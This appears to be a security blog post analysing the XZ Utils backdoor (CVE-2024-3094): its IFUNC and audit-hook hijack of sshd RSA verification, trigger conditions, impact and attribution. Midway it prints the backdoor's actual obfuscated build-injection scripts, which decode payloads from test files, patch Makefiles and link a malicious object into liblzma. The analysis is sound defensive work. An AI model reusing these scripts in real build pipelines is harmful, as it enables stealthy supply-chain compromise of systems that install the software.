XZ BackDoor (CVE-2024-3094): a Multi-Year Effort by an Advanced Threat Actor

With this post I would like to provide a technical dive and considerations about the recently disclosed XZ BackDoor vulnerability (CVE-2024-3094). This vulnerability, which affects the XZ Utils library, a widely used data compression utility in Linux distributions, had the potential for severe consequences, including remote code execution (RCE) and unauthorized access to impacted systems. Furthermore, I will delve deeper into the sophisticated and long-term nature of the attack, suggesting the involvement of a state-sponsored threat actor. The attacker’s tactics, techniques, and procedures (TTPs) demonstrate a high level of technical expertise and a well-planned, multi-stage approach to infiltrating the XZ Utils project and introducing the malicious code.

Malicious Code Implementation Overview

The implementation of the XZ BackDoor (CVE-2024-3094) reveals a sophisticated and multi-layered approach that leverages various advanced techniques to infiltrate the XZ Utils project and introduce the malicious code. At the core of the backdoor’s implementation is the abuse of the IFUNC (Indirect Function) resolver mechanism in the GNU C library (glibc). The attacker crafted an IFUNC resolver function that is responsible for selecting and returning the appropriate implementation of the targeted RSA decryption function at runtime. Indirect functions are a powerful feature in glibc that allow developers to include multiple versions of a function within a library, and then dynamically select which version to use at runtime. This is often employed to provide optimized function implementations. By manipulating the IFUNC resolver, the attacker can ensure that their malicious RSA decryption implementation is selected and executed instead of the legitimate one. Accompanying the IFUNC resolver hijacking is the presence of an obfuscated script within the XZ Utils source code. This script is responsible for the injection of a malicious shared object (SO) library, which contains the core of the backdoor’s functionality, including the IFUNC resolver and the malicious RSA decryption implementation. The obfuscation techniques employed, such as string encoding and control flow obfuscation, make the script and the injected SO library difficult to detect. The attacker has also integrated the malicious components into the XZ Utils build process, ensuring that the backdoor is present in the distributed source code tarballs but not in the public GIT repository. This approach allows the attacker to maintain persistence and avoid detection during the software distribution and deployment phases, leveraging custom build scripts and the strategic injection of the malicious SO library at specific points in the build process. The backdoor injects code that checks for specific conditions to allow attackers to execute arbitrary commands in the context of affected systems.

A not so “open” code

One of the main big points that is often associated with the security of open-source code is that it can be seen and controlled by anyone, at any time. This obviously, in itself, represents a big advantage compared to the presumed security of “closed” code. Consequently, one of the questions that has most gripped many enthusiasts in the sector is: how was it possible that a backdoor could have been included in “open” code subjected to everyone’s review ? The answer is that the backdoor’s code was not included in the upstream source code of the project, but through two binary object files (they were committed as data blob, not as source code) and finally injected into the build. These two files (tests/files/bad-3-corrupt_lzma2.xz and tests/files/good-large_compressed.lzma) have been injected into the build process to execute the following bash script as first infection stage:

####Hello####
#��Z�.hj�
eval `grep ^srcdir= config.status`
if test -f ../../config.status;then
eval `grep ^srcdir= ../../config.status`
srcdir="../../$srcdir"
fi
export i="((head -c +1024 >/dev/null) && head -c +2048 && (head -c +1024 >/dev/null) && head -c +2048 && (head -c +1024 >/dev/null) && head -c +2048 && (head -c +1024 >/dev/null) && head -c +2048 && (head -c +1024 >/dev/null) && head -c +2048 && (head -c +1024 >/dev/null) && head -c +2048 && (head -c +1024 >/dev/null) && head -c +2048 && (head -c +1024 >/dev/null) && head -c +2048 && (head -c +1024 >/dev/null) && head -c +2048 && (head -c +1024 >/dev/null) && head -c +2048 && (head -c +1024 >/dev/null) && head -c +2048 && (head -c +1024 >/dev/null) && head -c +2048 && (head -c +1024 >/dev/null) && head -c +2048 && (head -c +1024 >/dev/null) && head -c +2048 && (head -c +1024 >/dev/null) && head -c +2048 && (head -c +1024 >/dev/null) && head -c +2048 && (head -c +1024 >/dev/null) && head -c +724)";(xz -dc $srcdir/tests/files/good-large_compressed.lzma|eval $i|tail -c +31265|tr "\5-\51\204-\377\52-\115\132-\203\0-\4\116-\131" "\0-\377")|xz -F raw --lzma1 -dc|/bin/sh
####World####

The script refers to the tests/files/good-large_compressed.lzma file to extract the malicious content within it and make it part of the build process, appending the following code to it:

P="-fPIC -DPIC -fno-lto -ffunction-sections -fdata-sections"
C="pic_flag=\" $P\""
O="^pic_flag=\" -fPIC -DPIC\"$"
R="is_arch_extension_supported"
x="__get_cpuid("
p="good-large_compressed.lzma"
U="bad-3-corrupt_lzma2.xz"
eval $zrKcVq
if test -f config.status; then
eval $zrKcSS
eval `grep ^LD=\'\/ config.status`
eval `grep ^CC=\' config.status`
eval `grep ^GCC=\' config.status`
eval `grep ^srcdir=\' config.status`
eval `grep ^build=\'x86_64 config.status`
eval `grep ^enable_shared=\'yes\' config.status`
eval `grep ^enable_static=\' config.status`
eval `grep ^gl_path_map=\' config.status`
eval $zrKccj
if ! grep -qs '\["HAVE_FUNC_ATTRIBUTE_IFUNC"\]=" 1"' config.status > /dev/null 2>&1;then
exit 0
fi
if ! grep -qs 'define HAVE_FUNC_ATTRIBUTE_IFUNC 1' config.h > /dev/null 2>&1;then
exit 0
fi
if test "x$enable_shared" != "xyes";then
exit 0
fi
if ! (echo "$build" | grep -Eq "^x86_64" > /dev/null 2>&1) && (echo "$build" | grep -Eq "linux-gnu$" > /dev/null 2>&1);then
exit 0
fi
if ! grep -qs "$R()" $srcdir/src/liblzma/check/crc64_fast.c > /dev/null 2>&1; then
exit 0
fi
if ! grep -qs "$R()" $srcdir/src/liblzma/check/crc32_fast.c > /dev/null 2>&1; then
exit 0
fi
if ! grep -qs "$R" $srcdir/src/liblzma/check/crc_x86_clmul.h > /dev/null 2>&1; then
exit 0
fi
if ! grep -qs "$x" $srcdir/src/liblzma/check/crc_x86_clmul.h > /dev/null 2>&1; then
exit 0
fi
if test "x$GCC" != 'xyes' > /dev/null 2>&1;then
exit 0
fi
if test "x$CC" != 'xgcc' > /dev/null 2>&1;then
exit 0
fi
LDv=$LD" -v"
if ! $LDv 2>&1 | grep -qs 'GNU ld' > /dev/null 2>&1;then
exit 0
fi
if ! test -f "$srcdir/tests/files/$p" > /dev/null 2>&1;then
exit 0
fi
if ! test -f "$srcdir/tests/files/$U" > /dev/null 2>&1;then
exit 0
fi
if test -f "$srcdir/debian/rules" || test "x$RPM_ARCH" = "xx86_64";then
eval $zrKcst
j="^ACLOCAL_M4 = \$(top_srcdir)\/aclocal.m4"
if ! grep -qs "$j" src/liblzma/Makefile > /dev/null 2>&1;then
exit 0
fi
z="^am__uninstall_files_from_dir = {"
if ! grep -qs "$z" src/liblzma/Makefile > /dev/null 2>&1;then
exit 0
fi
w="^am__install_max ="
if ! grep -qs "$w" src/liblzma/Makefile > /dev/null 2>&1;then
exit 0
fi
E=$z
if ! grep -qs "$E" src/liblzma/Makefile > /dev/null 2>&1;then
exit 0
fi
Q="^am__vpath_adj_setup ="
if ! grep -qs "$Q" src/liblzma/Makefile > /dev/null 2>&1;then
exit 0
fi
M="^am__include = include"
if ! grep -qs "$M" src/liblzma/Makefile > /dev/null 2>&1;then
exit 0
fi
L="^all: all-recursive$"
if ! grep -qs "$L" src/liblzma/Makefile > /dev/null 2>&1;then
exit 0
fi
m="^LTLIBRARIES = \$(lib_LTLIBRARIES)"
if ! grep -qs "$m" src/liblzma/Makefile > /dev/null 2>&1;then
exit 0
fi
u="AM_V_CCLD = \$(am__v_CCLD_\$(V))"
if ! grep -qs "$u" src/liblzma/Makefile > /dev/null 2>&1;then
exit 0
fi
if ! grep -qs "$O" libtool > /dev/null 2>&1;then
exit 0
fi
eval $zrKcTy
b="am__test = $U"
sed -i "/$j/i$b" src/liblzma/Makefile || true
d=`echo $gl_path_map | sed 's/\\\/\\\\\\\\/g'`
b="am__strip_prefix = $d"
sed -i "/$w/i$b" src/liblzma/Makefile || true
b="am__dist_setup = \$(am__strip_prefix) | xz -d 2>/dev/null | \$(SHELL)"
sed -i "/$E/i$b" src/liblzma/Makefile || true
b="\$(top_srcdir)/tests/files/\$(am__test)"
s="am__test_dir=$b"
sed -i "/$Q/i$s" src/liblzma/Makefile || true
h="-Wl,--sort-section=name,-X"
if ! echo "$LDFLAGS" | grep -qs -e "-z,now" -e "-z -Wl,now" > /dev/null 2>&1;then
h=$h",-z,now"
fi
j="liblzma_la_LDFLAGS += $h"
sed -i "/$L/i$j" src/liblzma/Makefile || true
sed -i "s/$O/$C/g" libtool || true
k="AM_V_CCLD = @echo -n \$(LTDEPS); \$(am__v_CCLD_\$(V))"
sed -i "s/$u/$k/" src/liblzma/Makefile || true
l="LTDEPS='\$(lib_LTDEPS)'; \\\\\n\
    export top_srcdir='\$(top_srcdir)'; \\\\\n\
    export CC='\$(CC)'; \\\\\n\
    export DEFS='\$(DEFS)'; \\\\\n\
    export DEFAULT_INCLUDES='\$(DEFAULT_INCLUDES)'; \\\\\n\
    export INCLUDES='\$(INCLUDES)'; \\\\\n\
    export liblzma_la_CPPFLAGS='\$(liblzma_la_CPPFLAGS)'; \\\\\n\
    export CPPFLAGS='\$(CPPFLAGS)'; \\\\\n\
    export AM_CFLAGS='\$(AM_CFLAGS)'; \\\\\n\
    export CFLAGS='\$(CFLAGS)'; \\\\\n\
    export AM_V_CCLD='\$(am__v_CCLD_\$(V))'; \\\\\n\
    export liblzma_la_LINK='\$(liblzma_la_LINK)'; \\\\\n\
    export libdir='\$(libdir)'; \\\\\n\
    export liblzma_la_OBJECTS='\$(liblzma_la_OBJECTS)'; \\\\\n\
    export liblzma_la_LIBADD='\$(liblzma_la_LIBADD)'; \\\\\n\
sed rpath \$(am__test_dir) | \$(am__dist_setup) >/dev/null 2>&1";
sed -i "/$m/i$l" src/liblzma/Makefile || true
eval $zrKcHD
fi
elif (test -f .libs/liblzma_la-crc64_fast.o) && (test -f .libs/liblzma_la-crc32_fast.o); then
eval $zrKcKQ
if ! grep -qs "$R()" $top_srcdir/src/liblzma/check/crc64_fast.c; then
exit 0
fi
if ! grep -qs "$R()" $top_srcdir/src/liblzma/check/crc32_fast.c; then
exit 0
fi
if ! grep -qs "$R" $top_srcdir/src/liblzma/check/crc_x86_clmul.h; then
exit 0
fi
if ! grep -qs "$x" $top_srcdir/src/liblzma/check/crc_x86_clmul.h; then
exit 0
fi
if ! grep -qs "$C" ../../libtool; then
exit 0
fi
if ! echo $liblzma_la_LINK | grep -qs -e "-z,now" -e "-z -Wl,now" > /dev/null 2>&1;then
exit 0
fi
if echo $liblzma_la_LINK | grep -qs -e "lazy" > /dev/null 2>&1;then
exit 0
fi
N=0
W=0
Y=`grep "dnl Convert it to C string syntax." $top_srcdir/m4/gettext.m4`
eval $zrKcjv
if test -z "$Y"; then
N=0
W=88792
else
N=88792
W=0
fi
xz -dc $top_srcdir/tests/files/$p | eval $i | LC_ALL=C sed "s/\(.\)/\1\n/g" | LC_ALL=C awk 'BEGIN{FS="\n";RS="\n";ORS="";m=256;for(i=0;i<m;i++){t[sprintf("x%c",i)]=i;c[i]=((i*7)+5)%m;}i=0;j=0;for(l=0;l<4096;l++){i=(i+1)%m;a=c[i];j=(j+a)%m;c[i]=c[j];c[j]=a;}}{v=t["x" (NF<1?RS:$1)];i=(i+1)%m;a=c[i];j=(j+a)%m;b=c[j];c[i]=b;c[j]=a;k=c[(a+b)%m];printf "%c",(v+k)%m}' | xz -dc --single-stream | ((head -c +$N > /dev/null 2>&1) && head -c +$W) > liblzma_la-crc64-fast.o || true
if ! test -f liblzma_la-crc64-fast.o; then
exit 0
fi
cp .libs/liblzma_la-crc64_fast.o .libs/liblzma_la-crc64-fast.o || true
V='#endif\n#if defined(CRC32_GENERIC) && defined(CRC64_GENERIC) && defined(CRC_X86_CLMUL) && defined(CRC_USE_IFUNC) && defined(PIC) && (defined(BUILDING_CRC64_CLMUL) || defined(BUILDING_CRC32_CLMUL))\nextern int _get_cpuid(int, void*, void*, void*, void*, void*);\nstatic inline bool _is_arch_extension_supported(void) { int success = 1; uint32_t r[4]; success = _get_cpuid(1, &r[0], &r[1], &r[2], &r[3], ((char*) __builtin_frame_address(0))-16); const uint32_t ecx_mask = (1 << 1) | (1 << 9) | (1 << 19); return success && (r[2] & ecx_mask) == ecx_mask; }\n#else\n#define _is_arch_extension_supported is_arch_extension_supported'
eval $yosA
if sed "/return is_arch_extension_supported()/ c\return _is_arch_extension_supported()" $top_srcdir/src/liblzma/check/crc64_fast.c | \
sed "/include \"crc_x86_clmul.h\"/a \\$V" | \
sed "1i # 0 \"$top_srcdir/src/liblzma/check/crc64_fast.c\"" 2>/dev/null | \
$CC $DEFS $DEFAULT_INCLUDES $INCLUDES $liblzma_la_CPPFLAGS $CPPFLAGS $AM_CFLAGS $CFLAGS -r liblzma_la-crc64-fast.o -x c -  $P -o .libs/liblzma_la-crc64_fast.o 2>/dev/null; then
cp .libs/liblzma_la-crc32_fast.o .libs/liblzma_la-crc32-fast.o || true
eval $BPep
if sed "/return is_arch_extension_supported()/ c\return _is_arch_extension_supported()" $top_srcdir/src/liblzma/check/crc32_fast.c | \
sed "/include \"crc32_arm64.h\"/a \\$V" | \
sed "1i # 0 \"$top_srcdir/src/liblzma/check/crc32_fast.c\"" 2>/dev/null | \
$CC $DEFS $DEFAULT_INCLUDES $INCLUDES $liblzma_la_CPPFLAGS $CPPFLAGS $AM_CFLAGS $CFLAGS -r -x c -  $P -o .libs/liblzma_la-crc32_fast.o; then
eval $RgYB
if $AM_V_CCLD$liblzma_la_LINK -rpath $libdir $liblzma_la_OBJECTS $liblzma_la_LIBADD; then
if test ! -f .libs/liblzma.so; then
mv -f .libs/liblzma_la-crc32-fast.o .libs/liblzma_la-crc32_fast.o || true
mv -f .libs/liblzma_la-crc64-fast.o .libs/liblzma_la-crc64_fast.o || true
fi
rm -fr .libs/liblzma.a .libs/liblzma.la .libs/liblzma.lai .libs/liblzma.so* || true
else
mv -f .libs/liblzma_la-crc32-fast.o .libs/liblzma_la-crc32_fast.o || true
mv -f .libs/liblzma_la-crc64-fast.o .libs/liblzma_la-crc64_fast.o || true
fi
rm -f .libs/liblzma_la-crc32-fast.o || true
rm -f .libs/liblzma_la-crc64-fast.o || true
else
mv -f .libs/liblzma_la-crc32-fast.o .libs/liblzma_la-crc32_fast.o || true
mv -f .libs/liblzma_la-crc64-fast.o .libs/liblzma_la-crc64_fast.o || true
fi
else
mv -f .libs/liblzma_la-crc64-fast.o .libs/liblzma_la-crc64_fast.o || true
fi
rm -f liblzma_la-crc64-fast.o || true
fi
eval $DHLd

How it’s possible to observe, the attacker injected liblzma_la-crc64_fast.o passing it off as an improvement code to the CRC 64 algorithm in the commit. However, inside the liblzma_la-crc64_fast.o is where the final malicious payload resides (sha256:cbeef92e67bf41ca9c015557d81f39adaba67ca9fb3574139754999030b83537). This malicious code is designed to leverage the ifunc (Indirect Function) mechanism to intercept the execution of the crc32_resolve() and crc64_resolve() functions in the xz/liblzma library. The backdoor’s implementation of these critical CRC functions first calls a function named _get_cpuid(), which is injected into the compiled liblzma library. This _get_cpuid() function is used to detect the target system architecture and ensure the backdoor is only activated on specific x86-64 Linux systems.

If the target system meets the required conditions, the backdoor’s versions of crc32_resolve() and crc64_resolve() will be executed instead of the original functions. May be the backdoor’s use of the ifunc mechanism was intended to make it less suspicious, as the presence of crc32_resolve() and crc64_resolve() functions calling _get_cpuid() would appear to be a normal part of the upstream xz/liblzma library. The backdoor also installed an “audit hook” into the dynamic linker of the Linux operating system, a critical component responsible for resolving library dependencies at runtime. By hooking into the dynamic linker’s audit mechanism, the backdoor gained the ability to alter the behavior of the linker itself. This allowed the backdoor to intercept and potentially modify the resolution of various symbols, including those involved in RSA public key decryption. Obviously, the implications of this audit hook are particularly concerning as it enables the backdoor to substitute the legitimate RSA decryption function with its own malicious implementation during SSH Key Authentication. The “audit hook” gets called from the _dl_audit_symbind function within the dynamic linker, and, crucially, the it seems to be specifically monitoring for the resolution of the RSA_public_decrypt@ symbol, which is a critical function involved in RSA public key decryption. The targeting of the RSA_public_decrypt@ symbol, in my opinion, highlights the attacker’s deep understanding of the SSH authentication process. By intercepting the resolution of this symbol, the backdoor’s audit hook gains the ability to potentially substitute the legitimate RSA decryption function with its own malicious implementation. This would allow the attacker to perform several malicious activities as the backdoor’s version of the RSA decryption function could be designed to check for a specific, pre-determined condition in the input data. In fact, the payload seems to be able to extract hidden commands from the public-key field of the provided RSA certificate. If the backdoor determined that these commands was signed by the attacker’s own private key, it would then execute that command on the impacted system. Essentially, this would allow the attacker to run whatever commands he/she wants on the target computer and often with the highest level of system access (known as “root” access). This also means that to have a profitable interaction with a vulnerable server, the private key held by the attacker is required. This consideration therefore also excludes the identification of vulnerable servers remotely through tools such as shodan and similar. Other interesting aspects extrapolated from the analysis of the malicious object refer to the conditions under which the backdoor is triggered. These are:

1) TERM env variable is not set (this variable is usually set by the program that launches the login shell).

2) The running binary is /usr/sbin/sshd

3) LD_DEBUG and LD_PROFILE are NOT set (If these variables are set, it usually indicates that someone is trying to debug, troubleshoot, or monitor the program’s behavior. That’s an anti-debug features of the backdoor)

4) The LANG environment variable needs to be set

Potential Impacts

The potential impact of the discovered SSH backdoor vulnerability is truly concerning, given the widespread use of the SSH protocol and the sophisticated nature of the attack. The SSH protocol is a fundamental component of modern computing, used to securely connect to systems across a wide range of industries and applications, from cloud infrastructure to industrial control systems. With OpenSSH running on almost 20 million IP addresses globally, the scope of this vulnerability is staggering. If the backdoor had been successfully deployed, it could have enabled a malicious actor to gain unauthorized access to a vast number of systems worldwide, with potentially devastating consequences. The ability of the backdoor to execute remote commands on affected systems could have facilitated a wide range of malicious activities, such as data theft, system compromise, and the deployment of additional malware. Given the sophisticated nature of the attack, the potential for the backdoor to evade detection and remain active for an extended period is particularly worrying. This capability could have enabled the attackers to selectively target systems or quickly cover their tracks, making it even more challenging for defenders to identify and mitigate the threat.

Behind the XZ BackDoor

The XZ BackDoor was introduced by an individual using the name Jia Tan and the GitHub username JiaT75. JiaT75 has an email address associated, which is jiat0218[@]gmail.com.

The GitHub account was created in 2021 and has been active since then. This individual contributed to several open-source however his/her primary focus appears to have been on the “XZ” project. The fact that the backdoor was introduced by a contributor with an established GitHub presence, who has been active in the xz project for over 2 years, raises significant concerns. This level of involvement and longevity within the project suggests a level of trust and familiarity that the attacker was able to leverage to insert the malicious code. The longevity of the account also raises questions about whether there are other versions of the software could be potentially compromised. In consideration of the persistence and longevity of the attack as well as the social engineering techniques used, it is possible to assume that behind the JiaT75 account lies a very well organized and technically very skilled group (in my opinion this level of sophistication suggests a deep understanding of the underlying Linux system architecture and a high level of expertise), potentially attributable to some state-sponsored threat actor.

Conclusions

The XZ BackDoor has been discovered in versions 5.6.0 and 5.6.1 of the XZ Utils library, which is widely used across many Linux distributions, including Fedora 41, Fedora Rawhide, Debian testing/unstable/experimental, openSUSE Tumbleweed, openSUSE MicroOS, and Kali Linux. The widespread adoption of XZ Utils means this backdoor could potentially impact a large number of Linux systems. The backdoor is designed to enable remote code execution (RCE) on affected systems. It achieves this by hijacking the function resolution process in the OpenSSH authentication routines, allowing the attacker to execute arbitrary commands as the root user. This RCE capability grants the attacker significant control over the compromised system, posing a serious security risk. The backdoor was introduced gradually over multiple commits, with parts of it hidden in the source code tarball releases rather than the public Git repository. This stealthy approach made it difficult to detect the malicious changes during the review process. The use of techniques like IFUNC (Indirect Function Calls) and obfuscation demonstrates a high level of technical sophistication. The combination of widespread distribution, remote code execution capability, and stealthy implementation makes this backdoor a significant threat. Attackers could potentially leverage this vulnerability to gain unauthorized access and control over a large number of Linux systems.